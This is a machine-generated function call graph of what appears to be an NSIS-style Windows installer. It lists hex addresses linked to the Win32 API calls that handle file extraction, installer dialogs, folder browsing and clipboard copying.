3682->3670 3682->3676 3682->3683 3683->3586 3685 406a76 5 API calls 3684->3685 3686 403d68 3685->3686 3687 403d80 3686->3687 3688 403d6e 3686->3688 3689 406550 3 API calls 3687->3689 3851 4065c9 wsprintfW 3688->3851 3690 403db0 3689->3690 3692 403dcf lstrcatW 3690->3692 3694 406550 3 API calls 3690->3694 3693 403d7e 3692->3693 3836 40402a 3693->3836 3694->3692 3697 406059 18 API calls 3698 403e01 3697->3698 3699 403e95 3698->3699 3701 406550 3 API calls 3698->3701 3700 406059 18 API calls 3699->3700 3702 403e9b 3700->3702 3708 403e33 3701->3708 3703 403eab LoadImageW 3702->3703 3704 4066bf 21 API calls 3702->3704 3705 403f51 3703->3705 3706 403ed2 RegisterClassW 3703->3706 3704->3703 3710 40140b 2 API calls 3705->3710 3709 403f08 SystemParametersInfoW CreateWindowExW 3706->3709 3739 403f5b 3706->3739 3707 403e54 lstrlenW 3712 403e62 lstrcmpiW 3707->3712 3713 403e88 3707->3713 3708->3699 3708->3707 3711 405f7e CharNextW 3708->3711 3709->3705 3714 403f57 3710->3714 3716 403e51 3711->3716 3712->3713 3717 403e72 GetFileAttributesW 3712->3717 3715 405f51 3 API calls 3713->3715 3718 40402a 22 API calls 3714->3718 3714->3739 3719 403e8e 3715->3719 3716->3707 3720 403e7e 3717->3720 3722 403f68 3718->3722 3852 406682 lstrcpynW 3719->3852 3720->3713 3721 405f9d 2 API calls 3720->3721 3721->3713 3724 403f74 ShowWindow 3722->3724 3725 403ff7 3722->3725 3727 406a06 3 API calls 3724->3727 3844 4057da OleInitialize 3725->3844 3729 403f8c 3727->3729 3728 403ffd 3730 404001 3728->3730 3731 404019 3728->3731 3732 403f9a GetClassInfoW 3729->3732 3734 406a06 3 API calls 3729->3734 3737 40140b 2 API calls 3730->3737 3730->3739 3733 40140b 2 API calls 3731->3733 3735 403fc4 DialogBoxParamW 3732->3735 3736 403fae GetClassInfoW RegisterClassW 3732->3736 3733->3739 3734->3732 3738 40140b 2 API calls 3735->3738 3736->3735 3737->3739 3738->3739 3739->3633 3740->3576 3854 406682 lstrcpynW 3741->3854 3743 40606a 3855 405ffc CharNextW CharNextW 3743->3855 3746 403a26 3746->3633 3755 406682 lstrcpynW 3746->3755 3747 406930 5 API calls 3753 406080 3747->3753 3748 4060b1 lstrlenW 3749 4060bc 3748->3749 3748->3753 3750 405f51 3 API calls 3749->3750 3752 4060c1 GetFileAttributesW 3750->3752 3751 4069df 2 API calls 3751->3753 3752->3746 3753->3746 3753->3748 3753->3751 3754 405f9d 2 API calls 3753->3754 3754->3748 3755->3621 3756->3625 3758 406a76 5 API calls 3757->3758 3759 403a62 lstrlenW 3758->3759 3760 406682 lstrcpynW 3759->3760 3760->3616 3761->3639 3763 405c22 3762->3763 3764 405c26 GetLastError 3762->3764 3763->3639 3764->3763 3766 405c44 GetLastError 3765->3766 3767 405c40 3765->3767 3766->3767 3767->3639 3769 406059 18 API calls 3768->3769 3770 405dae 3769->3770 3771 405db6 DeleteFileW 3770->3771 3772 405dcd 3770->3772 3773 405f04 3771->3773 3774 405eed 3772->3774 3861 406682 lstrcpynW 3772->3861 3773->3639 3774->3773 3781 4069df 2 API calls 3774->3781 3776 405df3 3777 405e06 3776->3777 3778 405df9 lstrcatW 3776->3778 3780 405f9d 2 API calls 3777->3780 3779 405e0c 3778->3779 3782 405e1c lstrcatW 3779->3782 3784 405e27 lstrlenW FindFirstFileW 3779->3784 3780->3779 3783 405f12 3781->3783 3782->3784 3783->3773 3785 405f16 3783->3785 3784->3774 3792 405e49 3784->3792 3786 405f51 3 API calls 3785->3786 3787 405f1c 3786->3787 3788 405d46 5 API calls 3787->3788 3791 405f28 3788->3791 3790 405ed0 FindNextFileW 3790->3792 3793 405ee6 FindClose 3790->3793 3794 405f42 3791->3794 3795 405f2c 3791->3795 3792->3790 3805 405e91 3792->3805 3862 406682 lstrcpynW 3792->3862 3793->3774 3797 405707 28 API calls 3794->3797 3795->3773 3798 405707 28 API calls 3795->3798 3797->3773 3800 405f39 3798->3800 3799 405d8e 64 API calls 3799->3805 3802 406442 40 API calls 3800->3802 3801 405707 28 API calls 3801->3790 3803 405f40 3802->3803 3803->3773 3804 405707 28 API calls 3804->3805 3805->3790 3805->3799 3805->3801 3805->3804 3806 406442 40 API calls 3805->3806 3863 405d46 3805->3863 3806->3805 3808 403b3f CopyFileW 3807->3808 3809 406456 3807->3809 3808->3633 3808->3639 3871 4062c8 3809->3871 3812 405ca4 3811->3812 3813 405c98 CloseHandle 3811->3813 3812->3639 3813->3812 3815 403c73 CloseHandle 3814->3815 3816 403c7d 3814->3816 3815->3816 3817 403c91 3816->3817 3818 403c87 CloseHandle 3816->3818 3905 403cbf 3817->3905 3818->3817 3821 405d8e 71 API calls 3822 403b95 OleUninitialize 3821->3822 3822->3596 3822->3597 3824 4061ae GetTickCount GetTempFileNameW 3823->3824 3825 4061e4 3824->3825 3826 403643 3824->3826 3825->3824 3825->3826 3826->3578 3827->3656 3828->3658 3830 405fab 3829->3830 3831 405fb1 CharPrevW 3830->3831 3832 403141 3830->3832 3831->3830 3831->3832 3833 406682 lstrcpynW 3832->3833 3833->3662 3834->3680 3835->3672 3837 40403e 3836->3837 3853 4065c9 wsprintfW 3837->3853 3839 4040af 3840 4040e3 22 API calls 3839->3840 3842 4040b4 3840->3842 3841 403ddf 3841->3697 3842->3841 3843 4066bf 21 API calls 3842->3843 3843->3842 3845 40464d SendMessageW 3844->3845 3850 4057fd 3845->3850 3846 405824 3847 40464d SendMessageW 3846->3847 3848 405836 OleUninitialize 3847->3848 3848->3728 3849 401389 2 API calls 3849->3850 3850->3846 3850->3849 3851->3693 3852->3699 3853->3839 3854->3743 3856 406019 3855->3856 3860 40602b 3855->3860 3858 406026 CharNextW 3856->3858 3856->3860 3857 40604f 3857->3746 3857->3747 3858->3857 3859 405f7e CharNextW 3859->3860 3860->3857 3860->3859 3861->3776 3862->3792 3864 40614d 2 API calls 3863->3864 3865 405d52 3864->3865 3866 405d61 RemoveDirectoryW 3865->3866 3867 405d69 DeleteFileW 3865->3867 3868 405d73 3865->3868 3869 405d6f 3866->3869 3867->3869 3868->3805 3869->3868 3870 405d7f SetFileAttributesW 3869->3870 3870->3868 3872 4062f8 3871->3872 3873 40631e GetShortPathNameW 3871->3873 3898 406172 GetFileAttributesW CreateFileW 3872->3898 3875 406333 3873->3875 3876 40643d 3873->3876 3875->3876 3877 40633b wsprintfA 3875->3877 3876->3808 3879 4066bf 21 API calls 3877->3879 3878 406302 CloseHandle GetShortPathNameW 3878->3876 3880 406316 3878->3880 3881 406363 3879->3881 3880->3873 3880->3876 3899 406172 GetFileAttributesW CreateFileW 3881->3899 3883 406370 3883->3876 3884 40637f GetFileSize GlobalAlloc 3883->3884 3885 4063a1 3884->3885 3886 406436 CloseHandle 3884->3886 3887 4061f5 ReadFile 3885->3887 3886->3876 3888 4063a9 3887->3888 3888->3886 3900 4060d7 lstrlenA 3888->3900 3891 4063c0 lstrcpyA 3894 4063e2 3891->3894 3892 4063d4 3893 4060d7 4 API calls 3892->3893 3893->3894 3895 406419 SetFilePointer 3894->3895 3896 406224 WriteFile 3895->3896 3897 40642f GlobalFree 3896->3897 3897->3886 3898->3878 3899->3883 3901 406118 lstrlenA 3900->3901 3902 406120 3901->3902 3903 4060f1 lstrcmpiA 3901->3903 3902->3891 3902->3892 3903->3902 3904 40610f CharNextA 3903->3904 3904->3901 3906 403ccd 3905->3906 3907 403c96 3906->3907 3908 403cd2 FreeLibrary GlobalFree 3906->3908 3907->3821 3908->3907 3908->3908 3915 4015c6 3916 402dab 21 API calls 3915->3916 3917 4015cd 3916->3917 3918 405ffc 4 API calls 3917->3918 3919 4015d6 3918->3919 3920 401636 3919->3920 3921 405f7e CharNextW 3919->3921 3928 405c30 2 API calls 3919->3928 3929 405c4d 5 API calls 3919->3929 3932 4015ff 3919->3932 3933 40161c GetFileAttributesW 3919->3933 3922 401668 3920->3922 3923 40163b 3920->3923 3921->3919 3926 401423 28 API calls 3922->3926 3935 401423 3923->3935 3931 401660 3926->3931 3928->3919 3929->3919 3930 40164f SetCurrentDirectoryW 3930->3931 3932->3919 3934 405bd6 2 API calls 3932->3934 3933->3919 3934->3932 3936 405707 28 API calls 3935->3936 3937 401431 3936->3937 3938 406682 lstrcpynW 3937->3938 3938->3930 3939 405846 3940 4059f0 3939->3940 3941 405867 GetDlgItem GetDlgItem GetDlgItem 3939->3941 3943 405a21 3940->3943 3944 4059f9 GetDlgItem CreateThread FindCloseChangeNotification 3940->3944 3984 404636 SendMessageW 3941->3984 3946 405a71 3943->3946 3947 405a38 ShowWindow ShowWindow 3943->3947 3948 405a4c 3943->3948 3944->3943 3987 4057da 5 API calls 3944->3987 3945 4058d7 3950 4058de GetClientRect GetSystemMetrics SendMessageW SendMessageW 3945->3950 3954 404668 8 API calls 3946->3954 3986 404636 SendMessageW 3947->3986 3949 405aac 3948->3949 3952 405a60 3948->3952 3953 405a86 ShowWindow 3948->3953 3949->3946 3957 405aba SendMessageW 3949->3957 3955 405930 SendMessageW SendMessageW 3950->3955 3956 40594c 3950->3956 3958 4045da SendMessageW 3952->3958 3960 405aa6 3953->3960 3961 405a98 3953->3961 3959 405a7f 3954->3959 3955->3956 3962 405951 SendMessageW 3956->3962 3963 40595f 3956->3963 3957->3959 3964 405ad3 CreatePopupMenu 3957->3964 3958->3946 3966 4045da SendMessageW 3960->3966 3965 405707 28 API calls 3961->3965 3962->3963 3968 404601 22 API calls 3963->3968 3967 4066bf 21 API calls 3964->3967 3965->3960 3966->3949 3969 405ae3 AppendMenuW 3967->3969 3970 40596f 3968->3970 3971 405b00 GetWindowRect 3969->3971 3972 405b13 TrackPopupMenu 3969->3972 3973 405978 ShowWindow 3970->3973 3974 4059ac GetDlgItem SendMessageW 3970->3974 3971->3972 3972->3959 3975 405b2e 3972->3975 3976 40599b 3973->3976 3977 40598e ShowWindow 3973->3977 3974->3959 3978 4059d3 SendMessageW SendMessageW 3974->3978 3979 405b4a SendMessageW 3975->3979 3985 404636 SendMessageW 3976->3985 3977->3976 3978->3959 3979->3979 3980 405b67 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3979->3980 3982 405b8c SendMessageW 3980->3982 3982->3982 3983 405bb5 GlobalUnlock SetClipboardData CloseClipboard 3982->3983 3983->3959 3984->3945 3985->3974 3986->3948 4106 404e48 4107 404e74 4106->4107 4108 404e58 4106->4108 4110 404ea7 4107->4110 4111 404e7a SHGetPathFromIDListW 4107->4111 4117 405cc6 GetDlgItemTextW 4108->4117 4113 404e91 SendMessageW 4111->4113 4114 404e8a 4111->4114 4112 404e65 SendMessageW 4112->4107 4113->4110 4115 40140b 2 API calls 4114->4115 4115->4113 4117->4112 4118 401c48 4119 402d89 21 API calls 4118->4119 4120 401c4f 4119->4120 4121 402d89 21 API calls 4120->4121 4122 401c5c 4121->4122 4123 401c71 4122->4123 4124 402dab 21 API calls 4122->4124 4125 401c81 4123->4125 4126 402dab 21 API calls 4123->4126 4124->4123 4127 401cd8 4125->4127 4128 401c8c 4125->4128 4126->4125 4129 402dab 21 API calls 4127->4129 4130 402d89 21 API calls 4128->4130 4131 401cdd 4129->4131 4132 401c91 4130->4132 4134 402dab 21 API calls 4131->4134 4133 402d89 21 API calls 4132->4133 4135 401c9d 4133->4135 4136 401ce6 FindWindowExW 4134->4136 4137 401cc8 SendMessageW 4135->4137 4138 401caa SendMessageTimeoutW 4135->4138 4139 401d08 4136->4139 4137->4139 4138->4139 4140 4028c9 4141 4028cf 4140->4141 4142 4028d7 FindClose 4141->4142 4143 402c2f 4141->4143 4142->4143 4147 4016d1 4148 402dab 21 API calls 4147->4148 4149 4016d7 GetFullPathNameW 4148->4149 4150 4016f1 4149->4150 4156 401713 4149->4156 4152 4069df 2 API calls 4150->4152 4150->4156 4151 401728 GetShortPathNameW 4153 402c2f 4151->4153 4154 401703 4152->4154 4154->4156 4157 406682 lstrcpynW 4154->4157 4156->4151 4156->4153 4157->4156 3390 401e53 GetDC 3398 402d89 3390->3398 3392 401e65 GetDeviceCaps MulDiv ReleaseDC 3393 402d89 21 API calls 3392->3393 3394 401e96 3393->3394 3395 4066bf 21 API calls 3394->3395 3396 401ed3 CreateFontIndirectW 3395->3396 3397 40263d 3396->3397 3399 4066bf 21 API calls 3398->3399 3400 402d9e 3399->3400 3400->3392 4158 402955 4159 402dab 21 API calls 4158->4159 4160 402961 4159->4160 4161 402977 4160->4161 4162 402dab 21 API calls 4160->4162 4163 40614d 2 API calls 4161->4163 4162->4161 4164 40297d 4163->4164 4186 406172 GetFileAttributesW CreateFileW 4164->4186 4166 40298a 4167 402a40 4166->4167 4168 4029a5 GlobalAlloc 4166->4168 4169 402a28 4166->4169 4170 402a47 DeleteFileW 4167->4170 4171 402a5a 4167->4171 4168->4169 4172 4029be 4168->4172 4173 403376 48 API calls 4169->4173 4170->4171 4187 4035fd SetFilePointer 4172->4187 4175 402a35 CloseHandle 4173->4175 4175->4167 4176 4029c4 4177 4035e7 ReadFile 4176->4177 4178 4029cd GlobalAlloc 4177->4178 4179 402a11 4178->4179 4180 4029dd 4178->4180 4181 406224 WriteFile 4179->4181 4182 403376 48 API calls 4180->4182 4183 402a1d GlobalFree 4181->4183 4185 4029ea 4182->4185 4183->4169 4184 402a08 GlobalFree 4184->4179 4185->4184 4186->4166 4187->4176 4202 4014d7 4203 402d89 21 API calls 4202->4203 4204 4014dd Sleep 4203->4204 4206 402c2f 4204->4206 4207 40195b 4208 402dab 21 API calls 4207->4208 4209 401962 lstrlenW 4208->4209 4210 40263d 4209->4210 4218 4020dd 4219 4020ef 4218->4219 4220 4021a1 4218->4220 4221 402dab 21 API calls 4219->4221 4222 401423 28 API calls 4220->4222 4223 4020f6 4221->4223 4228 4022fb 4222->4228 4224 402dab 21 API calls 4223->4224 4225 4020ff 4224->4225 4226 402115 LoadLibraryExW 4225->4226 4227 402107 GetModuleHandleW 4225->4227 4226->4220 4229 402126 4226->4229 4227->4226 4227->4229 4238 406ae5 4229->4238 4232 402170 4234 405707 28 API calls 4232->4234 4233 402137 4235 401423 28 API calls 4233->4235 4236 402147 4233->4236 4234->4236 4235->4236 4236->4228 4237 402193 FreeLibrary 4236->4237 4237->4228 4243 4066a4 WideCharToMultiByte 4238->4243 4240 406b02 4241 406b09 GetProcAddress 4240->4241 4242 402131 4240->4242 4241->4242 4242->4232 4242->4233 4243->4240 4244 402b5e 4245 402bb0 4244->4245 4246 402b65 4244->4246 4247 406a76 5 API calls 4245->4247 4249 402d89 21 API calls 4246->4249 4250 402bae 4246->4250 4248 402bb7 4247->4248 4251 402dab 21 API calls 4248->4251 4252 402b73 4249->4252 4253 402bc0 4251->4253 4254 402d89 21 API calls 4252->4254 4253->4250 4255 402bc4 IIDFromString 4253->4255 4257 402b7f 4254->4257 4255->4250 4256 402bd3 4255->4256 4256->4250 4262 406682 lstrcpynW 4256->4262 4261 4065c9 wsprintfW 4257->4261 4259 402bf0 CoTaskMemFree 4259->4250 4261->4250 4262->4259 4263 402a60 4264 402d89 21 API calls 4263->4264 4265 402a66 4264->4265 4266 402aa9 4265->4266 4267 402a8d 4265->4267 4275 402933 4265->4275 4268 402ac3 4266->4268 4269 402ab3 4266->4269 4270 402a92 4267->4270 4271 402aa3 4267->4271 4273 4066bf 21 API calls 4268->4273 4272 402d89 21 API calls 4269->4272 4277 406682 lstrcpynW 4270->4277 4271->4275 4278 4065c9 wsprintfW 4271->4278 4272->4271 4273->4271 4277->4275 4278->4275 4279 401761 4280 402dab 21 API calls 4279->4280 4281 401768 4280->4281 4282 4061a1 2 API calls 4281->4282 4283 40176f 4282->4283 4283->4283 4284 401d62 4285 402d89 21 API calls 4284->4285 4286 401d73 SetWindowLongW 4285->4286 4287 402c2f 4286->4287 4288 4028e3 4289 4028eb 4288->4289 4290 4028ef FindNextFileW 4289->4290 4292 402901 4289->4292 4291 402948 4290->4291 4290->4292 4294 406682 lstrcpynW 4291->4294 4294->4292 4295 401568 4296 402ba9 4295->4296 4299 4065c9 wsprintfW 4296->4299 4298 402bae 4299->4298 4307 40196d 4308 402d89 21 API calls 4307->4308 4309 401974 4308->4309 4310 402d89 21 API calls 4309->4310 4311 401981 4310->4311 4312 402dab 21 API calls 4311->4312 4313 401998 lstrlenW 4312->4313 4315 4019a9 4313->4315 4314 4019ea 4315->4314 4319 406682 lstrcpynW 4315->4319 4317 4019da 4317->4314 4318 4019df lstrlenW 4317->4318 4318->4314 4319->4317 4320 40506e GetDlgItem GetDlgItem 4321 4050c0 7 API calls 4320->4321 4333 4052e5 4320->4333 4322 405167 DeleteObject 4321->4322 4323 40515a SendMessageW 4321->4323 4324 405170 4322->4324 4323->4322 4326 4051a7 4324->4326 4328 4066bf 21 API calls 4324->4328 4325 4053c7 4327 405473 4325->4327 4336 405420 SendMessageW 4325->4336 4359 4052d8 4325->4359 4329 404601 22 API calls 4326->4329 4331 405485 4327->4331 4332 40547d SendMessageW 4327->4332 4334 405189 SendMessageW SendMessageW 4328->4334 4330 4051bb 4329->4330 4335 404601 22 API calls 4330->4335 4339 4054ae 4331->4339 4345 405497 ImageList_Destroy 4331->4345 4346 40549e 4331->4346 4332->4331 4333->4325 4363 405354 4333->4363 4374 404fbc SendMessageW 4333->4374 4334->4324 4341 4051cc 4335->4341 4343 405435 SendMessageW 4336->4343 4336->4359 4337 4053b9 SendMessageW 4337->4325 4338 404668 8 API calls 4344 405674 4338->4344 4342 405628 4339->4342 4367 4054e9 4339->4367 4379 40503c 4339->4379 4348 4052a7 GetWindowLongW SetWindowLongW 4341->4348 4355 40521f SendMessageW 4341->4355 4357 4052a2 4341->4357 4360 405271 SendMessageW 4341->4360 4361 40525d SendMessageW 4341->4361 4349 40563a ShowWindow GetDlgItem ShowWindow 4342->4349 4342->4359 4351 405448 4343->4351 4345->4346 4346->4339 4347 4054a7 GlobalFree 4346->4347 4347->4339 4350 4052c0 4348->4350 4349->4359 4352 4052c5 ShowWindow 4350->4352 4353 4052dd 4350->4353 4356 405459 SendMessageW 4351->4356 4372 404636 SendMessageW 4352->4372 4373 404636 SendMessageW 4353->4373 4355->4341 4356->4327 4357->4348 4357->4350 4359->4338 4360->4341 4361->4341 4363->4325 4363->4337 4364 4055f3 4365 4055fe InvalidateRect 4364->4365 4368 40560a 4364->4368 4365->4368 4366 405517 SendMessageW 4371 40552d 4366->4371 4367->4366 4367->4371 4368->4342 4388 404f77 4368->4388 4370 4055a1 SendMessageW SendMessageW 4370->4371 4371->4364 4371->4370 4372->4359 4373->4333 4375 40501b SendMessageW 4374->4375 4376 404fdf GetMessagePos ScreenToClient SendMessageW 4374->4376 4377 405013 4375->4377 4376->4377 4378 405018 4376->4378 4377->4363 4378->4375 4391 406682 lstrcpynW 4379->4391 4381 40504f 4392 4065c9 wsprintfW 4381->4392 4383 405059 4384 40140b 2 API calls 4383->4384 4385 405062 4384->4385 4393 406682 lstrcpynW 4385->4393 4387 405069 4387->4367 4394 404eae 4388->4394 4390 404f8c 4390->4342 4391->4381 4392->4383 4393->4387 4395 404ec7 4394->4395 4396 4066bf 21 API calls 4395->4396 4397 404f2b 4396->4397 4398 4066bf 21 API calls 4397->4398 4399 404f36 4398->4399 4400 4066bf 21 API calls 4399->4400 4401 404f4c lstrlenW wsprintfW SetDlgItemTextW 4400->4401 4401->4390 4402 40166f 4403 402dab 21 API calls 4402->4403 4404 401675 4403->4404 4405 4069df 2 API calls 4404->4405 4406 40167b 4405->4406 4407 402af0 4408 402d89 21 API calls 4407->4408 4409 402af6 4408->4409 4410 402933 4409->4410 4411 4066bf 21 API calls 4409->4411 4411->4410 4412 404771 lstrlenW 4413 404790 4412->4413 4414 404792 WideCharToMultiByte 4412->4414 4413->4414 4415 4026f1 4416 402d89 21 API calls 4415->4416 4424 402700 4416->4424 4417 40283d 4418 40274a ReadFile 4418->4417 4418->4424 4419 4061f5 ReadFile 4419->4424 4420 40278a MultiByteToWideChar 4420->4424 4421 40283f 4428 4065c9 wsprintfW 4421->4428 4422 406253 5 API calls 4422->4424 4424->4417 4424->4418 4424->4419 4424->4420 4424->4421 4424->4422 4425 4027b0 SetFilePointer MultiByteToWideChar 4424->4425 4426 402850 4424->4426 4425->4424 4426->4417 4427 402871 SetFilePointer 4426->4427 4427->4417 4428->4417 4429 404af2 4430 404b1e 4429->4430 4431 404b2f 4429->4431 4490 405cc6 GetDlgItemTextW 4430->4490 4433 404b3b GetDlgItem 4431->4433 4439 404b9a 4431->4439 4435 404b4f 4433->4435 4434 404b29 4437 406930 5 API calls 4434->4437 4438 404b63 SetWindowTextW 4435->4438 4443 405ffc 4 API calls 4435->4443 4436 404c7e 4440 404e2d 4436->4440 4492 405cc6 GetDlgItemTextW 4436->4492 4437->4431 4444 404601 22 API calls 4438->4444 4439->4436 4439->4440 4445 4066bf 21 API calls 4439->4445 4442 404668 8 API calls 4440->4442 4450 404e41 4442->4450 4451 404b59 4443->4451 4447 404b7f 4444->4447 4448 404c0e SHBrowseForFolderW 4445->4448 4446 404cae 4449 406059 18 API calls 4446->4449 4452 404601 22 API calls 4447->4452 4448->4436 4453 404c26 CoTaskMemFree 4448->4453 4454 404cb4 4449->4454 4451->4438 4457 405f51 3 API calls 4451->4457 4455 404b8d 4452->4455 4456 405f51 3 API calls 4453->4456 4493 406682 lstrcpynW 4454->4493 4491 404636 SendMessageW 4455->4491 4459 404c33 4456->4459 4457->4438 4462 404c6a SetDlgItemTextW 4459->4462 4466 4066bf 21 API calls 4459->4466 4461 404b93 4464 406a76 5 API calls 4461->4464 4462->4436 4463 404ccb 4465 406a76 5 API calls 4463->4465 4464->4439 4473 404cd2 4465->4473 4467 404c52 lstrcmpiW 4466->4467 4467->4462 4470 404c63 lstrcatW 4467->4470 4468 404d13 4494 406682 lstrcpynW 4468->4494 4470->4462 4471 404d1a 4472 405ffc 4 API calls 4471->4472 4474 404d20 GetDiskFreeSpaceW 4472->4474 4473->4468 4477 405f9d 2 API calls 4473->4477 4479 404d6b 4473->4479 4476 404d44 MulDiv 4474->4476 4474->4479 4476->4479 4477->4473 4478 404ddc 4481 404dff 4478->4481 4483 40140b 2 API calls 4478->4483 4479->4478 4480 404f77 24 API calls 4479->4480 4482 404dc9 4480->4482 4495 404623 KiUserCallbackDispatcher 4481->4495 4485 404dde SetDlgItemTextW 4482->4485 4486 404dce 4482->4486 4483->4481 4485->4478 4488 404eae 24 API calls 4486->4488 4487 404e1b 4487->4440 4489 404a4b SendMessageW 4487->4489 4488->4478 4489->4440 4490->4434 4491->4461 4492->4446 4493->4463 4494->4471 4495->4487 3424 401774 3425 402dab 21 API calls 3424->3425 3426 40177b 3425->3426 3427 4017a3 3426->3427 3428 40179b 3426->3428 3493 406682 lstrcpynW 3427->3493 3492 406682 lstrcpynW 3428->3492 3431 4017a1 3435 406930 5 API calls 3431->3435 3432 4017ae 3494 405f51 lstrlenW CharPrevW 3432->3494 3449 4017c0 3435->3449 3439 4017d2 CompareFileTime 3439->3449 3440 401892 3466 405707 3440->3466 3442 405707 28 API calls 3445 40187e 3442->3445 3443 406682 lstrcpynW 3443->3449 3448 4018c3 SetFileTime 3450 4018d5 FindCloseChangeNotification 3448->3450 3449->3439 3449->3440 3449->3443 3451 4066bf 21 API calls 3449->3451 3460 401869 3449->3460 3462 40614d GetFileAttributesW 3449->3462 3465 406172 GetFileAttributesW CreateFileW 3449->3465 3497 4069df FindFirstFileW 3449->3497 3500 405ce2 3449->3500 3450->3445 3452 4018e6 3450->3452 3451->3449 3453 4018eb 3452->3453 3454 4018fe 3452->3454 3455 4066bf 21 API calls 3453->3455 3456 4066bf 21 API calls 3454->3456 3458 4018f3 lstrcatW 3455->3458 3459 401906 3456->3459 3458->3459 3461 405ce2 MessageBoxIndirectW 3459->3461 3460->3442 3460->3445 3461->3445 3463 40616c 3462->3463 3464 40615f SetFileAttributesW 3462->3464 3463->3449 3464->3463 3465->3449 3467 405722 3466->3467 3476 40189c 3466->3476 3468 40573e lstrlenW 3467->3468 3469 4066bf 21 API calls 3467->3469 3470 405767 3468->3470 3471 40574c lstrlenW 3468->3471 3469->3468 3473 40577a 3470->3473 3474 40576d SetWindowTextW 3470->3474 3472 40575e lstrcatW 3471->3472 3471->3476 3472->3470 3475 405780 SendMessageW SendMessageW SendMessageW 3473->3475 3473->3476 3474->3473 3475->3476 3477 403376 3476->3477 3478 4033a1 3477->3478 3479 403385 SetFilePointer 3477->3479 3504 40347e GetTickCount 3478->3504 3479->3478 3482 4018af 3482->3448 3482->3450 3485 40347e 46 API calls 3486 4033d8 3485->3486 3486->3482 3487 403444 ReadFile 3486->3487 3489 4033e7 3486->3489 3487->3482 3489->3482 3490 4061f5 ReadFile 3489->3490 3519 406224 WriteFile 3489->3519 3490->3489 3492->3431 3493->3432 3495 4017b4 lstrcatW 3494->3495 3496 405f6d lstrcatW 3494->3496 3495->3431 3496->3495 3498 406a00 3497->3498 3499 4069f5 FindClose 3497->3499 3498->3449 3499->3498 3501 405cf7 3500->3501 3502 405d43 3501->3502 3503 405d0b MessageBoxIndirectW 3501->3503 3502->3449 3503->3502 3505 4035d6 3504->3505 3506 4034ac 3504->3506 3508 403033 36 API calls 3505->3508 3521 4035fd SetFilePointer 3506->3521 3509 4033a8 3508->3509 3509->3482 3517 4061f5 ReadFile 3509->3517 3510 4034b7 SetFilePointer 3515 4034dc 3510->3515 3514 406224 WriteFile 3514->3515 3515->3509 3515->3514 3516 4035b7 SetFilePointer 3515->3516 3522 4035e7 3515->3522 3525 406bf1 3515->3525 3532 403033 3515->3532 3516->3505 3518 4033c1 3517->3518 3518->3482 3518->3485 3520 406242 3519->3520 3520->3489 3521->3510 3523 4061f5 ReadFile 3522->3523 3524 4035fa 3523->3524 3524->3515 3526 406c16 3525->3526 3527 406c1e 3525->3527 3526->3515 3527->3526 3528 406ca5 GlobalFree 3527->3528 3529 406cae GlobalAlloc 3527->3529 3530 406d25 GlobalAlloc 3527->3530 3531 406d1c GlobalFree 3527->3531 3528->3529 3529->3526 3529->3527 3530->3526 3530->3527 3531->3530 3533 403044 3532->3533 3534 40305c 3532->3534 3535 40304d DestroyWindow 3533->3535 3538 403054 3533->3538 3536 403064 3534->3536 3537 40306c GetTickCount 3534->3537 3535->3538 3547 406ab2 3536->3547 3537->3538 3539 40307a 3537->3539 3538->3515 3541 403082 3539->3541 3542 4030af CreateDialogParamW ShowWindow 3539->3542 3541->3538 3551 403017 3541->3551 3542->3538 3544 403090 wsprintfW 3545 405707 28 API calls 3544->3545 3546 4030ad 3545->3546 3546->3538 3548 406acf PeekMessageW 3547->3548 3549 406ac5 DispatchMessageW 3548->3549 3550 406adf 3548->3550 3549->3548 3550->3538 3552 403026 3551->3552 3553 403028 MulDiv 3551->3553 3552->3553 3553->3544 4496 4014f5 SetForegroundWindow 4497 402c2f 4496->4497 4498 401a77 4499 402d89 21 API calls 4498->4499 4500 401a80 4499->4500 4501 402d89 21 API calls 4500->4501 4502 401a25 4501->4502 4503 401578 4504 401591 4503->4504 4505 401588 ShowWindow 4503->4505 4506 402c2f 4504->4506 4507 40159f ShowWindow 4504->4507 4505->4504 4507->4506 3998 4023f9 3999 402dab 21 API calls 3998->3999 4000 402408 3999->4000 4001 402dab 21 API calls 4000->4001 4002 402411 4001->4002 4003 402dab 21 API calls 4002->4003 4004 40241b GetPrivateProfileStringW 4003->4004 4508 40567b 4509 40568b 4508->4509 4510 40569f 4508->4510 4512 405691 4509->4512 4513 4056e8 4509->4513 4511 4056a7 IsWindowVisible 4510->4511 4519 4056be 4510->4519 4511->4513 4514 4056b4 4511->4514 4516 40464d SendMessageW 4512->4516 4515 4056ed CallWindowProcW 4513->4515 4517 404fbc 5 API calls 4514->4517 4518 40569b 4515->4518 4516->4518 4517->4519 4519->4515 4520 40503c 4 API calls 4519->4520 4520->4513 4521 401ffb 4522 402dab 21 API calls 4521->4522 4523 402002 4522->4523 4524 4069df 2 API calls 4523->4524 4525 402008 4524->4525 4527 402019 4525->4527 4528 4065c9 wsprintfW 4525->4528 4528->4527 4529 401b7c 4530 402dab 21 API calls 4529->4530 4531 401b83 4530->4531 4532 402d89 21 API calls 4531->4532 4533 401b8c wsprintfW 4532->4533 4534 402c2f 4533->4534 4535 401000 4536 401037 BeginPaint GetClientRect 4535->4536 4537 40100c DefWindowProcW 4535->4537 4539 4010f3 4536->4539 4540 401179 4537->4540 4541 401073 CreateBrushIndirect FillRect DeleteObject 4539->4541 4542 4010fc 4539->4542 4541->4539 4543 401102 CreateFontIndirectW 4542->4543 4544 401167 EndPaint 4542->4544 4543->4544 4545 401112 6 API calls 4543->4545 4544->4540 4545->4544 4546 401680 4547 402dab 21 API calls 4546->4547 4548 401687 4547->4548 4549 402dab 21 API calls 4548->4549 4550 401690 4549->4550 4551 402dab 21 API calls 4550->4551 4552 401699 MoveFileW 4551->4552 4553 4016a5 4552->4553 4554 4016ac 4552->4554 4556 401423 28 API calls 4553->4556 4555 4069df 2 API calls 4554->4555 4558 4022fb 4554->4558 4557 4016bb 4555->4557 4556->4558 4557->4558 4559 406442 40 API calls 4557->4559 4559->4553 3230 404102 3231 40411a 3230->3231 3232 40427b 3230->3232 3231->3232 3233 404126 3231->3233 3234 4042cc 3232->3234 3235 40428c GetDlgItem GetDlgItem 3232->3235 3237 404131 SetWindowPos 3233->3237 3238 404144 3233->3238 3236 404326 3234->3236 3244 401389 2 API calls 3234->3244 3239 404601 22 API calls 3235->3239 3257 404276 3236->3257 3303 40464d 3236->3303 3237->3238 3241 40414d ShowWindow 3238->3241 3242 40418f 3238->3242 3243 4042b6 SetClassLongW 3239->3243 3245 404268 3241->3245 3246 40416d GetWindowLongW 3241->3246 3247 404197 DestroyWindow 